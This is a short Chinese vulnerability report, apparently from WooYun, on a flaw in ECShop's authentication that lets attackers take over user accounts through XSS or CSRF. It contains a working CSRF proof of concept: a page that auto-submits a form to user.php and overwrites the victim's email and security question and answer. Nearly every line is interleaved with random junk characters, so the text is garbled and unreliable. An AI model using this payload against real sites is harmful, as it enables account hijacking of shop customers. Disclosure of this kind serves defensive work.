简要描述:2 s: d7 u* @! U4 l# u2 b# y
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
' k3 _2 }4 ]/ s/ n+ M9 l$ o8 K
) i$ e! C/ z7 a) v+ @Demo For:http://www.wooyun.org/bug.php?action=view&id=3958 |) G/ A( j1 I5 O1 N4 x
# k2 h0 U" k6 g7 H详细说明:
. p1 N% n _* @. g! t4 b利用csrf和xss可以突破官方所说的“障碍”
0 m( q! d0 _/ H( uxss版本已经有人说明
% t/ U6 G# O3 C. `0 N% W这里给出csrf版本
* t- d5 K: t! L& P( T( ] ~5 y5 P' n1 V+ n. a( {1 r7 c7 v
漏洞证明:
9 d( J" a9 s b* f3 I3 K: n f$ I<html>' \9 w. J) L% S G$ b
<body>
5 j: K6 s4 [ @2 B) b5 p<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
/ }- o7 Q' j; K b9 Y<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 H4 Q) ^4 Q% I# k' ]5 F/ Z<INPUT TYPE="text" NAME="act" value="act_edit_profile">% _0 d; [8 b C/ R( Q9 _
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
- a& q4 o# U. r9 o& T/ r/ D9 L<INPUT TYPE="text" NAME="passwd_answer" value="exploit">, m" S* M! i* w( ` d$ ^7 t" R
</body>
3 n& q* o+ j8 P2 @. y2 k* Z<script>* _" q# h; M: S
document.forms[0].submit();, R/ a. e7 x$ g9 y( z2 k& ?
</script>7 @2 R, X- j& E' z, \8 i
</html>: v; W1 \9 h6 X7 Y- C
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失! `+ ]' a& M, x8 l
n$ q( D# m( j( m4 A% o6 z |